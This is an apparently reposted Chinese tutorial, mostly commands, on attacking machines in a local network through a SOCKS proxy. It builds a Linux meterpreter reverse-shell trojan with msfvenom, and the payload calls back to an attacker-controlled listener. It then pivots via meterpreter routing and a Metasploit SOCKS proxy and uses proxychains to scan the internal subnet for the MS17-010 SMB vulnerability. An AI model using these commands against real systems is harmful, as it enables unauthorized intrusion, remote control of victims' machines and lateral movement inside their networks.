栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

通过socks 代理 攻击局域网的电脑

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

通过socks 代理 攻击局域网的电脑

攻击其他局域网内的电脑

文章目录
  • 前言
  • 一、生成木马
    • 1.生成木马
    • 2.设置监听
    • 3.设置reverse payload
  • 二、等待目标机上钩之后
  • 三、配置 socks 代理
    • --------------容易遇到的问题--------------


前言

提示:

123


一、生成木马 1.生成木马
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "x00" -f elf -o feixiang
2.设置监听
use exploit/multi/handler
3.设置reverse payload

exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.55
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) run

二、等待目标机上钩之后

1.把meterpreter 保存到后台

background

查看路由信息

route

2.添加一条路由转发

 route add 192.168.110.111 255.255.255.0 1

1:是sessions
配置完路由实际上就可以访问目标了。

三、配置 socks 代理
use auxiliary/server/socks_proxy    #启动代理
run
vim /etc/proxychains4.conf       #更改代理文件
socks5 192.168.0.55 1080 #添加一行

1080 跟socks_proxy 的 srvport 对应

2.通过代理扫描内网。

└─# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.110.0/24

3.通过代理启动 msf

└─ proxychains msfdb run
--------------容易遇到的问题--------------

添加 firewall-cmd --zone=public --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)

重新载入 firewall-cmd --reload

查看 firewall-cmd --zone=public --query-port=80/tcp

删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/881878.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号